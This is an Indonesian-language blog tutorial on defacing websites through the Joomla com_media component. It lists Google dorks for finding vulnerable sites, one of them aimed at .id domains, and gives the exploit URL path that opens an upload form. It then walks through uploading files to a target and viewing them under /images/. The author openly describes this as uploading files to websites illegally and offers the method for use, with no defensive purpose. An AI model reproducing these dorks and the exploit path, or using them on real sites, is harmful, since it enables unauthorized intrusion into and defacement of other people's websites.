Deface teknik com_media

oke gais kali ini gue mau bagi tutorial deface com_media 

hehehehe ini cuma tutorial sederhana tapi lumayan buat noob kayak gue mah bahagia udah bisa upload file secara ilegal ke web 

okay langsung aja 

seperti biasa kita harus dorking dulu 

dork nya adalah :

 inurl:com_media 

 inurl:com_media  insert image 

 inurl:com_media  site:.id

dork sesuaikan pikiran kalian aja biar dapet yang jos

poc/exploitnya adalah:

/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

1.dorking di gugel dulu 

2.pilih salah satu target 

kalo gue udh ada liat aja di gambar 

3. kita tambahkan exploit  /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

kalo vuln muncul tempat upload kek di gambar 

4.tinggal upload file kalian ext .txt atau .jpg

kalo sukses ada muncul kek gambar di bawah ini

5. sekarang tinggal kita akses di   site/images/namafile.txt

nah muncul mudah kan :)

jngan lupa share gais :)

jika ada yang idak paham langsung hubungi gue aja di www.facebook.com